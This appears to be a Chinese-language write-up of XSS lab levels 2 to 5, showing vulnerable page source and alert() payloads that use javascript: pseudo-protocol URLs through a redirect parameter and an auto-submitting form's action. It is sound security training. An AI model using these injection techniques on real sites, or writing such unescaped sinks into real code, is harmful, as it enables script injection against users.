XSS的魔力

Level 2

尝试输入 “asd”,查看源码可以看到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<html lang="zh"><head>
    <meta charset="UTF-8">
    <title>XSS配套测试平台</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <link rel="stylesheet" href="https://houtai.baidu.com/v2/csssdk">
    <script type="text/javascript" src="main.js"></script>
    <style>
        html, body, .app-wrapper {
            position: relative;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
        }
    </style>
</head>
<body>
    <div id="root" class="app-wrapper amis-scope"><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">
    	<div id="ccc">
    		
    	</div>
    </span></div></div></div></div></div></div>
    <script type="text/javascript">
    	if(location.search == ""){
    		location.search = "?username=xss"
    	}
    	var username = 'asd';
    	document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
    </script>

</body></html>

输出点在script中

只要构造好闭合语句即可

Level 3

第三关和第二关的不同在于 username 没有使用escape()函数进行转义。而在测试输入 asd’ 时候发现script处被转义

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<body>
    <div id="root" class="app-wrapper amis-scope"><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">
    	<div id="ccc">
    		
    	</div>
    </span></div></div></div></div></div></div>
    <script type="text/javascript">
    	if(location.search == ""){
    		location.search = "?username=xss"
    	}
    	var username = 'asd\'';
    	document.getElementById('ccc').innerHTML= "Welcome " + username;
    </script>

</body>

那么构造的点应该在html的div块处

Level 4

js跳转带来的xss 跳转到伪协议

1
http://172.18.0.2:3000/level4?jumpUrl=javascript:alert()

Level 5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<html lang="zh"><head>
    <meta charset="UTF-8">
    <title>XSS配套测试平台</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <link rel="stylesheet" href="https://houtai.baidu.com/v2/csssdk">
    <script type="text/javascript" src="main.js"></script>
    <style>
        html, body, .app-wrapper {
            position: relative;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
        }
    </style>
</head>
<body>
    <div id="root" class="app-wrapper amis-scope"><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">
    	<div id="ccc">
    		自动提交表单
    		<form action="" method="POST" id="autoForm">
    			<input type="text" name="test">
    			<input type="submit">
    		</form>
    	</div>
    </span></div></div></div></div></div></div>
    <script type="text/javascript">
    	if(getQueryVariable('autosubmit') !== false){
    		var autoForm = document.getElementById('autoForm');
    		autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
    		autoForm.submit();
    	}else{
    		
    	}
		function getQueryVariable(variable)
		{
		       var query = window.location.search.substring(1);
		       var vars = query.split("&");
		       for (var i=0;i<vars.length;i++) {
		               var pair = vars[i].split("=");
		               if(pair[0] == variable){return pair[1];}
		       }
		       return(false);
		}
    </script>

</body></html>

表单自动提交 且action可控 控制表单提交到伪协议的地址

1
/level5?action=javascript:alert()&autosubmit=1